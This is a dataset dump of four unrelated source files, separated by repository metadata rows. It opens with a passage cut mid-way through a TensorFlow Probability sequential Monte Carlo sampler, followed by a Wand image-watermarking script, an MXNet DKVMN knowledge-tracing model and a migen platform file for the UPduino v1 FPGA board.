ess_threshold_ratio=0.5,
parallel_iterations=10,
seed=None,
name=None):
"""Runs Sequential Monte Carlo to sample from the posterior distribution.
This function uses an MCMC transition operator (e.g., Hamiltonian Monte Carlo)
to sample from a series of distributions that slowly interpolates between
an initial 'prior' distribution:
`exp(prior_log_prob_fn(x))`
and the target 'posterior' distribution:
  `exp(prior_log_prob_fn(x) + likelihood_log_prob_fn(x))`,
by mutating a collection of MC samples (i.e., particles). The approach is also
  known as a particle filter in some literature. The current implementation is
  largely based on Del Moral et al. [1], which adapts the tempering sequence
  (based on the effective sample size) and the scaling of the mutation kernel
  (based on the sample covariance of the particles) at each stage.
Args:
prior_log_prob_fn: Python callable that returns the log density of the
prior distribution.
likelihood_log_prob_fn: Python callable which takes an argument like
`current_state` (or `*current_state` if it's a list) and returns its
(possibly unnormalized) log-density under the likelihood distribution.
current_state: Nested structure of `Tensor`s, each of shape
`concat([[num_particles, b1, ..., bN], latent_part_event_shape])`, where
`b1, ..., bN` are optional batch dimensions. Each batch represents an
independent SMC run.
min_num_steps: The minimal number of kernel transition steps in one mutation
of the MC samples.
max_num_steps: The maximum number of kernel transition steps in one mutation
of the MC samples. Note that the actual number of steps in one mutation is
      tuned during sampling and is likely lower than max_num_steps.
max_stage: Integer number of the stage for increasing the temperature
from 0 to 1.
make_kernel_fn: Python `callable` which returns a `TransitionKernel`-like
      object. Must accept the `TransitionKernel`'s `target_log_prob_fn`, the
      current state, and the proposal scalings (see, e.g., `make_rwmh_kernel_fn`
      above). The `target_log_prob_fn` argument represents the
      `TransitionKernel`'s target log distribution. Note:
      `sample_sequential_monte_carlo` creates a new `target_log_prob_fn`
      which is an interpolation between the supplied `prior_log_prob_fn` and
      `likelihood_log_prob_fn`; it is this interpolated function which is used as
      an argument to `make_kernel_fn`.
tuning_fn: Python `callable` which takes the number of steps, the log
scaling, and the log acceptance ratio from the last mutation and output
the number of steps and log scaling for the next mutation.
make_tempered_target_log_prob_fn: Python `callable` that takes the
`prior_log_prob_fn`, `likelihood_log_prob_fn`, and `inverse_temperatures`
and creates a `target_log_prob_fn` `callable` that pass to
`make_kernel_fn`.
resample_fn: Python `callable` to generate the indices of resampled
particles, given their weights. Generally, one of
`tfp.experimental.mcmc.resample_independent` or
`tfp.experimental.mcmc.resample_systematic`, or any function
with the same signature.
Default value: `tfp.experimental.mcmc.resample_systematic`.
ess_threshold_ratio: Target ratio for effective sample size.
parallel_iterations: The number of iterations allowed to run in parallel.
It must be a positive integer. See `tf.while_loop` for more details.
seed: Python integer or TFP seedstream to seed the random number generator.
name: Python `str` name prefixed to Ops created by this function.
Default value: `None` (i.e., 'sample_sequential_monte_carlo').
Returns:
    n_stage: Number of mutation stages SMC ran.
final_state: `Tensor` or Python `list` of `Tensor`s representing the
final state(s) of the Markov chain(s). The output are the posterior
samples.
final_kernel_results: `collections.namedtuple` of internal calculations used
to advance the chain.
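  #### Examples
  A minimal sketch with a toy Normal prior and likelihood (this assumes the
  function is exposed as `tfp.experimental.mcmc.sample_sequential_monte_carlo`
  and that 1000 particles are adequate for the problem at hand):
  ```python
  import tensorflow_probability as tfp
  tfd = tfp.distributions
  prior = tfd.Normal(loc=0., scale=1.)
  likelihood = tfd.Normal(loc=1., scale=0.5)
  # Initialize the particles by sampling them from the prior.
  init_state = prior.sample(1000)
  n_stage, posterior_samples, _ = (
      tfp.experimental.mcmc.sample_sequential_monte_carlo(
          prior.log_prob, likelihood.log_prob, init_state))
  ```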
#### References
[1] Del Moral, Pierre, Arnaud Doucet, and Ajay Jasra. An adaptive sequential
Monte Carlo method for approximate Bayesian computation.
      _Statistics and Computing_, 22(5):1009-1020, 2012.
"""
with tf.name_scope(name or 'sample_sequential_monte_carlo'):
seed_stream = SeedStream(seed, salt='smc_seed')
unwrap_state_list = not tf.nest.is_nested(current_state)
if unwrap_state_list:
current_state = [current_state]
current_state = [
tf.convert_to_tensor(s, dtype_hint=tf.float32) for s in current_state
]
# Initial preprocessing at Stage 0
likelihood_log_prob = likelihood_log_prob_fn(*current_state)
likelihood_rank = ps.rank(likelihood_log_prob)
dimension = ps.reduce_sum([
ps.reduce_prod(ps.shape(x)[likelihood_rank:]) for x in current_state])
# We infer the particle shapes from the resulting likelihood:
# [num_particles, b1, ..., bN]
particle_shape = ps.shape(likelihood_log_prob)
num_particles, batch_shape = particle_shape[0], particle_shape[1:]
effective_sample_size_threshold = tf.cast(
num_particles * ess_threshold_ratio, tf.int32)
# TODO(b/152412213): Revisit this default parameter.
# Default to the optimal scaling of a random walk kernel for a d-dimensional
# normal distributed targets: 2.38 ** 2 / d.
# For more detail see:
# Roberts GO, Gelman A, Gilks WR. Weak convergence and optimal scaling of
# random walk Metropolis algorithms. _The annals of applied probability_.
# 1997;7(1):110-20.
scale_start = (
tf.constant(2.38 ** 2, dtype=likelihood_log_prob.dtype) /
tf.constant(dimension, dtype=likelihood_log_prob.dtype))
inverse_temperature = tf.zeros(batch_shape, dtype=likelihood_log_prob.dtype)
scalings = ps.ones_like(likelihood_log_prob) * ps.minimum(scale_start, 1.)
kernel = make_kernel_fn(
make_tempered_target_log_prob_fn(
prior_log_prob_fn,
likelihood_log_prob_fn,
inverse_temperature),
current_state,
scalings,
seed=seed_stream)
pkr = kernel.bootstrap_results(current_state)
_, kernel_target_log_prob = gather_mh_like_result(pkr)
particle_info = ParticleInfo(
log_accept_prob=ps.zeros_like(likelihood_log_prob),
log_scalings=tf.math.log(scalings),
tempered_log_prob=kernel_target_log_prob,
likelihood_log_prob=likelihood_log_prob,
)
current_pkr = SMCResults(
num_steps=tf.convert_to_tensor(
max_num_steps, dtype=tf.int32, name='num_steps'),
inverse_temperature=inverse_temperature,
log_marginal_likelihood=tf.zeros_like(inverse_temperature),
particle_info=particle_info
)
def update_weights_temperature(inverse_temperature, likelihood_log_prob):
"""Calculate the next inverse temperature and update weights."""
likelihood_diff = likelihood_log_prob - tf.reduce_max(
likelihood_log_prob, axis=0)
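      # Bisection search for the largest admissible temperature increase: the
      # new inverse temperature is pushed up until the effective sample size
      # of the reweighted particles drops to the target threshold.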
def _body_fn(new_beta, upper_beta, lower_beta, eff_size, log_weights):
"""One iteration of the temperature and weight update."""
new_beta = (lower_beta + upper_beta) / 2.0
log_weights = (new_beta - inverse_temperature) * likelihood_diff
log_weights_norm = tf.math.log_softmax(log_weights, axis=0)
eff_size = tf.cast(
tf.exp(-tf.math.reduce_logsumexp(2 * log_weights_norm, axis=0)),
tf.int32)
upper_beta = tf.where(
eff_size < effective_sample_size_threshold,
new_beta, upper_beta)
lower_beta = tf.where(
eff_size < effective_sample_size_threshold,
lower_beta, new_beta)
return new_beta, upper_beta, lower_beta, eff_size, log_weights
def _cond_fn(new_beta, upper_beta, lower_beta, eff_size, *_): # pylint: disable=unused-argument
# TODO(junpenglao): revisit threshold below to be dtype specific.
threshold = 1e-6
return (
tf.math.reduce_any(upper_beta - lower_beta > threshold) &
tf.math.reduce_any(eff_size != effective_sample_size_threshold)
)
(new_beta, upper_beta, lower_beta, eff_size, log_weights) = tf.while_loop( # pylint: disable=unused-variable
cond=_cond_fn,
body=_body_fn,
loop_vars=(
tf.zeros_like(inverse_temperature),
tf.fill(
ps.shape(inverse_temperature),
tf.constant(2, inverse_temperature.dtype)),
inverse_temperature,
tf.zeros_like(inverse_temperature, dtype=tf.int32),
tf.zeros_like(likelihood_diff)),
parallel_iterations=parallel_iterations
)
log_weights = tf.where(new_beta < 1.,
log_weights,
(1. - inverse_temperature) * likelihood_diff)
marginal_loglike_ = reduce_logmeanexp(
(new_beta - inverse_temperature) * likelihood_log_prob, axis=0)
new_inverse_temperature = tf.clip_by_value(new_beta, 0., 1.)
return marginal_loglike_, new_inverse_temperature, log_weights
def mutate(
current_state,
log_scalings,
num_steps,
inverse_temperature):
"""Mutate the state using a Transition kernel."""
with tf.name_scope('mutate_states'):
scalings = tf.exp(log_scalings)
kernel = make_kernel_fn(
make_tempered_target_log_prob_fn(
prior_log_prob_fn,
likelihood_log_prob_fn,
inverse_temperature),
current_state,
scalings,
seed=seed_stream)
pkr = kernel.bootstrap_results(current_state)
kernel_log_accept_ratio, _ = gather_mh_like_result(pkr)
def mutate_onestep(i, state, pkr, log_accept_prob_sum):
next_state, next_kernel_results = kernel.one_step(state, pkr)
kernel_log_accept_ratio, _ = gather_mh_like_result(pkr)
log_accept_prob = tf.minimum(kernel_log_accept_ratio, 0.)
log_accept_prob_sum = log_add_exp(
log_accept_prob_sum, log_accept_prob)
return i + 1, next_state, next_kernel_results, log_accept_prob_sum
(
_,
next_state,
next_kernel_results,
log_accept_prob_sum
) = tf.while_loop(
cond=lambda i, *args: i < num_steps,
body=mutate_onestep,
loop_vars=(
tf.zeros([], dtype=tf.int32),
current_state,
pkr,
# we accumulate the acceptance probability in log space.
tf.fill(
ps.shape(kernel_log_accept_ratio),
tf.constant(-np.inf, kernel_log_accept_ratio.dtype))
),
parallel_iterations=parallel_iterations
)
_, kernel_target_log_prob = gather_mh_like_result(next_kernel_results)
avg_log_accept_prob_per_particle = log_accept_prob_sum - tf.math.log(
tf.cast(num_steps + 1, log_accept_prob_sum.dtype))
return (next_state,
avg_log_accept_prob_per_particle,
kernel_target_log_prob)
    # One SMC step.
def smc_body_fn(stage, state, smc_kernel_result):
"""Run one stage of SMC with constant temperature."""
(
new_marginal,
new_inv_temperature,
log_weights
) = update_weights_temperature(
smc_kernel_result.inverse_temperature,
smc_kernel_result.particle_info.likelihood_log_prob)
# TODO(b/152412213) Use a tf.scan to better collect debug info.
if PRINT_DEBUG:
tf.print(
'Stage:', stage,
'Beta:', new_inv_temperature,
'n_steps:', smc_kernel_result.num_steps,
'accept:', tf.exp(reduce_logmeanexp(
smc_kernel_result.particle_info.log_accept_prob, axis=0)),
'scaling:', tf.exp(reduce_logmeanexp(
smc_kernel_result.particle_info.log_scalings, axis=0))
)
(resampled_state,
resampled_particle_info), _ = weighted_resampling.resample(
particles=(state, smc_kernel_result.particle_info),
log_weights=log_weights,
resample_fn=resample_fn,
seed=seed_stream)
next_num_steps, next_log_scalings = tuning_fn(
smc_kernel_result.num_steps,
resampled_particle_info.log_scalings,
resampled_particle_info.log_accept_prob)
# Skip tuning at stage 0.
next_num_steps = tf.where(stage == 0,
smc_kernel_result.num_steps,
next_num_steps)
next_log_scalings = tf.where(stage == 0,
resampled_particle_info.log_scalings,
next_log_scalings)
next_num_steps = tf.clip_by_value(
next_num_steps, min_num_steps, max_num_steps)
next_state, log_accept_prob, tempered_log_prob = mutate(
resampled_state,
next_log_scalings,
next_num_steps,
new_inv_temperature)
next_pkr = SMCResults(
num_steps=next_num_steps,
inverse_temperature=new_inv_temperature,
log_marginal_likelihood=(new_marginal +
smc_kernel_result.log_marginal_likelihood),
particle_info=ParticleInfo(
log_accept_prob=log_accept_prob,
log_scalings=next_log_scalings,
tempered_log_prob=tempered_log_prob,
likelihood_log_prob=likelihood_log_prob_fn(*next_state),
))
return stage + 1, next_state, next_pkr
(
n_stage,
final_state,
final_kernel_results
) = tf.while_loop(
cond=lambda i, state, pkr: ( # pylint: disable=g-long-lambda
(i < max_stage) &
tf.reduce_any(pkr.inverse_temperature < 1.)),
body=smc_body_fn,
loop_vars=(
tf.zeros([], dtype=tf.int32),
current_state,
current_pkr),
parallel_iterations=parallel_iterations
)
if unwrap_state_list:
final_state = final_state[0]
return n_stage, final_state, final_kernel_results
| [
"[email protected]"
] | |
b674cb6e1d39ea0db9ce015053153a2bdaba5038 | 699cad5fee497cce94463decf1bf2b811e3fd244 | /16이미지요리/watermark.py | 783d8c4b885bcab80a88fe98c929e68daade41b9 | [] | no_license | Jeonghwan-Yoo/brain_python3 | 91974019a29013abe8c9f9ed132c48b404259e2f | a22e870515e760aaa497cbc99305977cf2f01a3d | refs/heads/master | 2020-07-27T00:02:29.604848 | 2019-09-16T13:16:09 | 2019-09-16T13:16:09 | 208,802,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | import sys
from wand.image import Image
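# Overlays the second image onto the first as a watermark (0.7 transparency at
# offset (100, 100)) and saves the result as "<image1>_<image2>".
# Usage: python watermark.py <Image 1> <Image 2>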
if len(sys.argv) < 3:
print('{0} <Image 1> <Image 2>'.format(sys.argv[0]))
sys.exit()
image1_path=sys.argv[1]
image2_path=sys.argv[2]
with Image(filename=image1_path) as image1:
with Image(filename=image2_path) as image2:
with image1.clone() as clone:
clone.watermark(image2, 0.7, 100, 100)
clone.save(filename=image1_path+'_'+image2_path) | [
"[email protected]"
] | |
858a8df04939295cb7b278f80a8174f99d92e283 | c1869b7106a4651ecc0f0f53b82d5f11021896e3 | /XKT/DKVMN/net.py | a5a8b8568a55b5a938ccfea0ee51b82b111fd30c | [
"MIT"
] | permissive | bigdata-ustc/XKT | 6efd7ff5b09c22ed9099f5b9b614edceff1cada0 | b3ac07541b92001b62d7cff4e8fe7e5a69c5c93c | refs/heads/master | 2021-09-22T19:22:25.563651 | 2021-09-16T02:56:10 | 2021-09-16T02:56:10 | 194,855,614 | 18 | 9 | MIT | 2021-09-16T02:56:11 | 2019-07-02T12:06:12 | Python | UTF-8 | Python | false | false | 20,141 | py | # coding: utf-8
# 2021/8/22 @ tongshiwei
from baize.mxnet.utils import format_sequence, mask_sequence_variable_length
from mxnet import gluon
from mxnet import ndarray
def get_net(ku_num, key_embedding_dim, value_embedding_dim, hidden_num,
key_memory_size,
nettype="DKVMN", dropout=0.0, **kwargs):
return DKVMN(
ku_num=ku_num,
key_embedding_dim=key_embedding_dim,
value_embedding_dim=value_embedding_dim,
hidden_num=hidden_num,
key_memory_size=key_memory_size,
nettype=nettype,
dropout=dropout,
**kwargs
)
class KVMNCell(gluon.HybridBlock):
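    """Key-value memory addressing cell.
    Computes softmax attention (correlation) weights of a control input over a
    memory matrix of shape (memory_size, memory_state_dim).
    """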
def __init__(self, memory_state_dim, memory_size, input_size=0, prefix=None, params=None, *args, **kwargs):
super(KVMNCell, self).__init__(prefix=prefix, params=params)
self._input_size = input_size
self.memory_size = memory_size
self.memory_state_dim = memory_state_dim
def addressing(self, F, control_input, memory):
"""
Parameters
----------
F
control_input: Shape (batch_size, control_state_dim)
memory: Shape (memory_size, memory_state_dim)
Returns
-------
correlation_weight: Shape (batch_size, memory_size)
"""
similarity_score = F.FullyConnected(data=control_input,
num_hidden=self.memory_size,
weight=memory,
no_bias=True,
name="similarity_score")
correlation_weight = F.SoftmaxActivation(similarity_score) # Shape: (batch_size, memory_size)
return correlation_weight
def reset(self):
pass
def hybrid_forward(self, F, control_input, memory, *args, **kwargs):
return self.addressing(F, control_input, memory)
class KVMNReadCell(KVMNCell):
def __init__(self, memory_state_dim, memory_size, input_size=0, prefix=None, params=None):
super(KVMNReadCell, self).__init__(memory_state_dim, memory_size, input_size, prefix, params)
def read(self, memory, control_input=None, read_weight=None):
return self(memory, control_input, read_weight)
def hybrid_forward(self, F, memory, control_input=None, read_weight=None):
"""
Parameters
----------
F
control_input: Shape (batch_size, control_state_dim)
memory: Shape (batch_size, memory_size, memory_state_dim)
read_weight: Shape (batch_size, memory_size)
Returns
-------
read_content: Shape (batch_size, memory_state_dim)
"""
if read_weight is None:
read_weight = self.addressing(F, control_input=control_input, memory=memory)
read_weight = F.Reshape(read_weight, shape=(-1, 1, self.memory_size))
read_content = F.Reshape(data=F.batch_dot(read_weight, memory),
# Shape (batch_size, 1, memory_state_dim)
shape=(-1, self.memory_state_dim)) # Shape (batch_size, memory_state_dim)
return read_content
class KVMNWriteCell(KVMNCell):
def __init__(self, memory_state_dim, memory_size, input_size=0,
erase_signal_weight_initializer=None, erase_signal_bias_initializer=None,
add_signal_weight_initializer=None, add_signal_bias_initializer=None,
prefix=None, params=None):
super(KVMNWriteCell, self).__init__(memory_state_dim, memory_size, input_size, prefix, params)
with self.name_scope():
self.erase_signal_weight = self.params.get('erase_signal_weight', shape=(memory_state_dim, input_size),
init=erase_signal_weight_initializer,
allow_deferred_init=True)
self.erase_signal_bias = self.params.get('erase_signal_bias', shape=(memory_state_dim,),
init=erase_signal_bias_initializer,
allow_deferred_init=True)
self.add_signal_weight = self.params.get('add_signal_weight', shape=(memory_state_dim, input_size),
init=add_signal_weight_initializer,
allow_deferred_init=True)
self.add_signal_bias = self.params.get('add_signal_bias', shape=(memory_state_dim,),
init=add_signal_bias_initializer,
allow_deferred_init=True)
def read(self, F, memory, control_input=None, read_weight=None):
if read_weight is None:
read_weight = self.addressing(F, control_input=control_input, memory=memory)
read_weight = F.Reshape(read_weight, shape=(-1, 1, self.memory_size))
read_content = F.Reshape(data=F.batch_dot(read_weight, memory, name=self.name + "read_content_batch_dot"),
# Shape (batch_size, 1, memory_state_dim)
shape=(-1, self.memory_state_dim)) # Shape (batch_size, memory_state_dim)
return read_content
def write(self, memory, control_input, write_weight):
return self(memory, control_input, write_weight)
def hybrid_forward(self, F, memory, control_input, write_weight,
erase_signal_weight, erase_signal_bias, add_signal_weight, add_signal_bias,
):
if write_weight is None:
write_weight = self.addressing(
F, control_input=control_input, memory=memory
) # Shape Shape (batch_size, memory_size)
# erase_signal Shape (batch_size, memory_state_dim)
erase_signal = F.FullyConnected(data=control_input,
num_hidden=self.memory_state_dim,
weight=erase_signal_weight,
bias=erase_signal_bias)
erase_signal = F.Activation(data=erase_signal, act_type='sigmoid', name=self.name + "_erase_signal")
# add_signal Shape (batch_size, memory_state_dim)
add_signal = F.FullyConnected(data=control_input,
num_hidden=self.memory_state_dim,
weight=add_signal_weight,
bias=add_signal_bias)
add_signal = F.Activation(data=add_signal, act_type='tanh', name=self.name + "_add_signal")
# erase_mult Shape (batch_size, memory_size, memory_state_dim)
erase_mult = 1 - F.batch_dot(F.Reshape(write_weight, shape=(-1, self.memory_size, 1)),
F.Reshape(erase_signal, shape=(-1, 1, self.memory_state_dim)),
name=self.name + "_erase_mult")
aggre_add_signal = F.batch_dot(F.Reshape(write_weight, shape=(-1, self.memory_size, 1)),
F.Reshape(add_signal, shape=(-1, 1, self.memory_state_dim)),
name=self.name + "_aggre_add_signal")
new_memory = memory * erase_mult + aggre_add_signal
return new_memory
class DKVMNCell(gluon.HybridBlock):
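    """Dynamic Key-Value Memory Network cell.
    Pairs a read-only key memory (used for addressing) with a writable value
    memory (holding the evolving knowledge state) and exposes an RNN-cell
    style interface (begin_state/unroll) over exercise sequences.
    """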
def __init__(self, key_memory_size, key_memory_state_dim, value_memory_size, value_memory_state_dim,
prefix=None, params=None):
super(DKVMNCell, self).__init__(prefix, params)
self._modified = False
self.reset()
with self.name_scope():
self.key_head = KVMNReadCell(
memory_size=key_memory_size,
memory_state_dim=key_memory_state_dim,
prefix=self.prefix + "->key_head"
)
self.value_head = KVMNWriteCell(
memory_size=value_memory_size,
memory_state_dim=value_memory_state_dim,
prefix=self.prefix + "->value_head"
)
self.key_memory_size = key_memory_size
self.key_memory_state_dim = key_memory_state_dim
self.value_memory_size = value_memory_size
self.value_memory_state_dim = value_memory_state_dim
def forward(self, *args):
"""Unrolls the recurrent cell for one time step.
Parameters
----------
inputs : sym.Variable
Input symbol, 2D, of shape (batch_size * num_units).
states : list of sym.Variable
RNN state from previous step or the output of begin_state().
Returns
-------
output : Symbol
Symbol corresponding to the output from the RNN when unrolling
for a single time step.
states : list of Symbol
The new state of this RNN after this unrolling.
The type of this symbol is same as the output of `begin_state()`.
This can be used as an input state to the next time step
of this RNN.
See Also
--------
begin_state: This function can provide the states for the first time step.
unroll: This function unrolls an RNN for a given number of (>=1) time steps.
"""
# pylint: disable= arguments-differ
self._counter += 1
return super(DKVMNCell, self).forward(*args)
def reset(self):
"""Reset before re-using the cell for another graph."""
self._init_counter = -1
self._counter = -1
for cell in self._children.values():
cell.reset()
def begin_state(self, batch_size=0, func=ndarray.zeros, **kwargs):
"""Initial state for this cell.
Parameters
----------
func : callable, default symbol.zeros
Function for creating initial state.
For Symbol API, func can be `symbol.zeros`, `symbol.uniform`,
`symbol.var etc`. Use `symbol.var` if you want to directly
feed input as states.
For NDArray API, func can be `ndarray.zeros`, `ndarray.ones`, etc.
batch_size: int, default 0
Only required for NDArray API. Size of the batch ('N' in layout)
dimension of input.
**kwargs :
Additional keyword arguments passed to func. For example
`mean`, `std`, `dtype`, etc.
Returns
-------
states : nested list of Symbol
Starting states for the first RNN step.
"""
assert not self._modified, \
"After applying modifier cells (e.g. ZoneoutCell) the base " \
"cell cannot be called directly. Call the modifier cell instead."
states = []
for info in self.state_info(batch_size):
self._init_counter += 1
if info is not None:
info.update(kwargs)
else:
info = kwargs
state = func(name='%sbegin_state_%d' % (self._prefix, self._init_counter),
**info)
states.append(state)
return states
def state_info(self, batch_size=0):
return [
{'shape': (batch_size, self.key_memory_size, self.key_memory_state_dim), '__layout__': 'NC'},
{'shape': (batch_size, self.value_memory_size, self.key_memory_state_dim), '__layout__': 'NC'}
]
def _alias(self):
return 'dkvmn_cell'
def attention(self, F, control_input, memory):
correlation_weight = self.key_head.addressing(F, control_input=control_input, memory=memory)
return correlation_weight # (batch_size, memory_size)
def read(self, F, read_weight, memory):
read_content = self.value_head.read(F, memory=memory, read_weight=read_weight)
return read_content # (batch_size, memory_state_dim)
def write(self, F, write_weight, control_input, memory):
memory_value = self.value_head.write(control_input=control_input,
memory=memory,
write_weight=write_weight)
return memory_value
def hybrid_forward(self, F, keys, values, key_memory, value_memory):
# Attention
correlation_weight = self.attention(F, keys, key_memory)
# Read Process
read_content = self.read(F, correlation_weight, value_memory)
# Write Process
next_value_memory = self.write(F, correlation_weight, values, value_memory)
return read_content, [key_memory, next_value_memory]
def unroll(self, length, keys, values, key_memory, value_memory, layout='NTC', merge_outputs=None,
valid_length=None):
"""Unrolls an RNN cell across time steps.
Parameters
----------
length : int
Number of steps to unroll.
inputs : Symbol, list of Symbol, or None
If `inputs` is a single Symbol (usually the output
of Embedding symbol), it should have shape
(batch_size, length, ...) if `layout` is 'NTC',
or (length, batch_size, ...) if `layout` is 'TNC'.
If `inputs` is a list of symbols (usually output of
previous unroll), they should all have shape
(batch_size, ...).
begin_memory : nested list of Symbol, optional
Input states created by `begin_state()`
or output state of another cell.
Created from `begin_state()` if `None`.
layout : str, optional
`layout` of input symbol. Only used if inputs
is a single Symbol.
merge_outputs : bool, optional
If `False`, returns outputs as a list of Symbols.
If `True`, concatenates output across time steps
and returns a single symbol with shape
(batch_size, length, ...) if layout is 'NTC',
or (length, batch_size, ...) if layout is 'TNC'.
If `None`, output whatever is faster.
valid_length : Symbol, NDArray or None
`valid_length` specifies the length of the sequences in the batch without padding.
This option is especially useful for building sequence-to-sequence models where
the input and output sequences would potentially be padded.
If `valid_length` is None, all sequences are assumed to have the same length.
If `valid_length` is a Symbol or NDArray, it should have shape (batch_size,).
The ith element will be the length of the ith sequence in the batch.
The last valid state will be return and the padded outputs will be masked with 0.
Note that `valid_length` must be smaller or equal to `length`.
Returns
-------
outputs : list of Symbol or Symbol
Symbol (if `merge_outputs` is True) or list of Symbols
(if `merge_outputs` is False) corresponding to the output from
the RNN from this unrolling.
states : list of Symbol
The new state of this RNN after this unrolling.
The type of this symbol is same as the output of `begin_state()`.
"""
# pylint: disable=too-many-locals
self.reset()
keys, axis, F, batch_size = format_sequence(length, keys, layout, False)
values, axis, F, batch_size = format_sequence(length, values, layout, False)
states = F.broadcast_to(F.expand_dims(value_memory, axis=0),
shape=(batch_size, self.value_memory_size, self.value_memory_state_dim))
outputs = []
all_states = []
for i in range(length):
output, [_, new_states] = self(keys[i], values[i], key_memory, states)
states = new_states
outputs.append(output)
if valid_length is not None:
all_states.append(states)
if valid_length is not None:
states = [F.SequenceLast(F.stack(*ele_list, axis=0),
sequence_length=valid_length,
use_sequence_length=True,
axis=0)
for ele_list in zip(*all_states)]
outputs = mask_sequence_variable_length(F, outputs, length, valid_length, axis, True)
# all_read_value_content = F.Concat(*outputs, num_args=length, dim=0)
outputs, _, _, _ = format_sequence(length, outputs, layout, merge_outputs)
return outputs, states
class DKVMN(gluon.HybridBlock):
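    """Dynamic Key-Value Memory Network for knowledge tracing.
    Embeds question ids (keys) and question-response pairs (values), routes
    them through a DKVMNCell memory, and predicts the probability of a correct
    response, following the DKVMN model of Zhang et al. (WWW 2017).
    """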
def __init__(self, ku_num, key_embedding_dim, value_embedding_dim, hidden_num,
key_memory_size, value_memory_size=None, key_memory_state_dim=None, value_memory_state_dim=None,
nettype="DKVMN", dropout=0.0,
key_memory_initializer=None, value_memory_initializer=None,
**kwargs):
super(DKVMN, self).__init__(kwargs.get("prefix"), kwargs.get("params"))
ku_num = int(ku_num)
key_embedding_dim = int(key_embedding_dim)
value_embedding_dim = int(value_embedding_dim)
hidden_num = int(hidden_num)
key_memory_size = int(key_memory_size)
value_memory_size = int(value_memory_size) if value_memory_size is not None else key_memory_size
self.length = None
self.nettype = nettype
self._mask = None
key_memory_state_dim = int(key_memory_state_dim) if key_memory_state_dim else key_embedding_dim
value_memory_state_dim = int(value_memory_state_dim) if value_memory_state_dim else value_embedding_dim
with self.name_scope():
self.key_memory = self.params.get(
'key_memory', shape=(key_memory_size, key_memory_state_dim),
init=key_memory_initializer,
)
self.value_memory = self.params.get(
'value_memory', shape=(value_memory_size, value_memory_state_dim),
init=value_memory_initializer,
)
embedding_dropout = kwargs.get("embedding_dropout", 0.2)
self.key_embedding = gluon.nn.Embedding(ku_num, key_embedding_dim)
self.value_embedding = gluon.nn.Embedding(2 * ku_num, value_embedding_dim)
self.embedding_dropout = gluon.nn.Dropout(embedding_dropout)
self.dkvmn = DKVMNCell(key_memory_size, key_memory_state_dim, value_memory_size, value_memory_state_dim)
self.input_nn = gluon.nn.Dense(50, flatten=False) # 50 is set by the paper authors
self.input_act = gluon.nn.Activation('tanh')
self.read_content_nn = gluon.nn.Dense(hidden_num, flatten=False)
self.read_content_act = gluon.nn.Activation('tanh')
self.dropout = gluon.nn.Dropout(dropout)
self.nn = gluon.nn.HybridSequential()
self.nn.add(
gluon.nn.Dense(ku_num, activation="tanh", flatten=False),
self.dropout,
gluon.nn.Dense(1, flatten=False),
)
def __call__(self, *args, mask=None):
self._mask = mask
result = super(DKVMN, self).__call__(*args)
self._mask = None
return result
def hybrid_forward(self, F, questions, responses, key_memory, value_memory, *args, **kwargs):
length = self.length if self.length else len(responses[0])
q_data = self.embedding_dropout(self.key_embedding(questions))
r_data = self.embedding_dropout(self.value_embedding(responses))
read_contents, states = self.dkvmn.unroll(
length, q_data, r_data, key_memory, value_memory, merge_outputs=True
)
input_embed_content = self.input_act(self.input_nn(q_data))
read_content_embed = self.read_content_act(
self.read_content_nn(
F.Concat(read_contents, input_embed_content, num_args=2, dim=2)
)
)
output = self.nn(read_content_embed)
output = F.sigmoid(output)
output = F.squeeze(output, axis=2)
return output, states
| [
"[email protected]"
] | |
9ecbb22d8a49abc54ee231701a047f52f535810c | 099da16d748e89106b6abea62e49641afe68d04b | /migen/build/platforms/upduino_v1.py | 8f41eb95fde882e115a3239ed0c902de246e7fcf | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | chipmuenk/migen | a191db2e0bbe8f6e1dfc87e54acf2ded13ce69a0 | a7eb394f46ac9d71f4598919294aa9efd1137bfe | refs/heads/master | 2020-05-18T23:29:09.950066 | 2019-11-01T18:56:14 | 2019-11-01T18:56:14 | 184,712,987 | 3 | 0 | NOASSERTION | 2019-05-03T07:08:37 | 2019-05-03T07:08:36 | null | UTF-8 | Python | false | false | 2,945 | py | from migen import *
from migen.build.generic_platform import *
from migen.build.lattice import LatticePlatform
from migen.build.lattice.programmer import IceStormProgrammer
_io = [
("rgb_led", 0,
Subsignal("r", Pins("41")),
Subsignal("g", Pins("40")),
Subsignal("b", Pins("39")),
IOStandard("LVCMOS33")
),
]
spiflash = [
# Only usable in PROG FLASH mode - see JP2 header
("spiflash", 0,
Subsignal("cs_n", Pins("16"), IOStandard("LVCMOS33")),
Subsignal("clk", Pins("15"), IOStandard("LVCMOS33")),
Subsignal("mosi", Pins("14"), IOStandard("LVCMOS33")),
Subsignal("miso", Pins("17"), IOStandard("LVCMOS33")),
),
]
_connectors = [
# JP5's pinout is all Free, except 1 (3.3V) and 2 (GND).
# 3 4 5 6 7 8 9 10 11 12 13 14 15 16
("JP5", "23 25 26 27 32 35 31 37 34 43 36 42 38 28"),
# 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
("JP6", "12 21 13 19 18 11 9 6 44 4 3 48 45 47 46 2"),
]
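# SB_HFOSC is the iCE40 UltraPlus internal high-frequency oscillator primitive
# (nominally 48 MHz); MachClock instantiates it and drives `out` from it.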
class MachClock(Module):
def __init__(self, period, out):
self.specials += Instance("SB_HFOSC",
i_CLKHFPU=C(1),
i_CLKHFEN=C(1),
o_CLKHF=out
)
class HfoscRouting(Module):
def __init__(self):
        self.hfosc_used = False  # only one clock can be driven by the internal oscillator
self.mach_clk_sig = Signal()
def mk_clk(self, name, clk_period):
if not self.hfosc_used:
self.mach_clk_sig.name_override = name
self.submodules.mclk = MachClock(clk_period, self.mach_clk_sig)
self.hfosc_used = True
else:
raise ConstraintError
return self.mach_clk_sig
class Platform(LatticePlatform):
default_clk_name = "sb_hfosc"
default_clk_period = 48
def __init__(self):
self.sb_hfosc_routing = HfoscRouting() # Internal oscillator routing.
LatticePlatform.__init__(self, "ice40-up5k-sg48", _io, _connectors,
toolchain="icestorm")
def request(self, *args, **kwargs):
try:
sig = GenericPlatform.request(self, *args, **kwargs)
except ConstraintError:
# ICE40UP5K internal clock
if args[0] == "sb_hfosc":
# Do not add to self.constraint_manager.matched because we
# don't want this signal to become part of the UCF.
sig = self.sb_hfosc_routing.mk_clk("sb_hfosc", 48)
return sig
def do_finalize(self, f, *args, **kwargs):
f += self.sb_hfosc_routing.get_fragment()
# Handle cases where hfosc is default not default.
